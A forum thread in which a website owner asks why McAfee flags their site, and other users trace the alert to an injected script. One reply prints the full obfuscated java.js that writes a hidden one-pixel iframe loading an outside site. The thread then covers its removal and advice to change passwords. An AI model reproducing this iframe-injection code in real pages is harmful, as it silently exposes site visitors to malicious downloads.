On:
http://www.roughdisko.com
which i have made, I get a virus scan message in Mcafee, Exploit-MhtRedir.gen.

I've looked in the html and can't see anything out of the ordinary.
If anybody could pinpoint the culprit for me that would be great! (the usual rgt click view source etc..).
BTW.. It's with Pickaweb, I've a few sites with them and one of them, the guestbook got hijacked by some Turkish hackers a while ago.
Ta!

Originally posted by hade
On:
http://www.roughdisko.com
which i have made, I get a virus scan message in Mcafee, Exploit-MhtRedir.gen.

I've looked in the html and can't see anything out of the ordinary.
If anybody could pinpoint the culprit for me that would be great! (the usual rgt click view source etc..).
BTW.. It's with Pickaweb, I've a few sites with them and one of them, the guestbook got hijacked by some Turkish hackers a while ago.
Ta!


What server is your site running on? Bet you it's IIS.

Get in touch with you host as it looks (to me) as if the box it is on has been compromised - can't see anything wrong with your HTML;).

Nope... the site runs on Linux: http://uptime.netcraft.com/up/graph/?host=www.roughdisko.com. I can't see anything in your html unless some of the javascript is triggering norton. Has this message always occurred or just suddenly started?

It's running Linux server. I just noticed the problem today, the website has been up for a number of months now and it has never happened before.
A few more things I've noticed:
Mcafee tells me the trojan is in a file called enter[1].htm
The status bar has 3 dots, as opposed to the usual "Done", and flickers slightly as if there is some sort of activity going on.

All the main pages of the site have exactly the same furniture, and the content has been added using the div tag (layers in D/weaver).

The only javascript in there is the stuff made with Fireworks for the rollovers and opening windows, all the pages use the same .js file for the rollovers too.

Could the host be using some sort of redirector frame, like what you get with the kickme.to kickass.at redirectors? May this be causing it?

Eeh, by eck!

I just had a look; I use XP and I got a "Do you want to install...." box, which everytime I tried to close it, just kept reappearing....it was asking me to install "web.exe" ....does that help?

:suspect:

Right at the bottom of the html for the main page is this:

<script language=javascript src="/images/java.js"></script>

Which is doing the flickering dots thing in the status bar, This javascript creates an invisible Iframe to http://www.fotoprofit.com/photo_catalog/index.php. which looks to be a bit of a dodgy site so this is probably where the problem is.

I'm not sure how this line could have been inserted into your html if you didn't do it yourself but if it was placed there by someone else then I would consider telling your host and changing your passwords.

Regards,

Grant

could it be anything to do with:

<script language=javascript src="/images/java.js"></script>

just before the close body. the contents of java.js is:

url = "http://www.fotoprofit.com/photo_catalog/index.php";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type="text/css">';
asd = '<IF'+'RA'+'ME SRC="';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='...'",7);

just beat me lonesome :)

www . fotoprofit . com by the way redirects to brides . ru so it is very likely this is your problem. as lonesome said, remove the javascript line straight away and then find out how it has got there.

Sorted!
It was the line :script language="javascript" src="/images/java.js"></script
Thanks for all your help!

don't stop there though - did you put it there?

Originally posted by LL200
don't stop there though - did you put it there?

Now why would I want to do a thing like that?

It's well out of order when sado's hijack innocent little websites, what's the point?

apologies, i didnt mean to imply that you'd do it on purpose, but if you didn't put it there then someone did and its definately worth investigating, even if all you do is contact your host and tell them.

We recently had the same sort of problem some one was trying a dictionary attack on one of our servers and found a user with the user name “staff” and the password “staff” (dumb I know).

They managed to upload a few dangerous files and host a page that looked just like an e-bay page but stole your username and password. We found it and removed it after about 3 hours filled in all the holes and notified the user.

There is a lot of it about out there.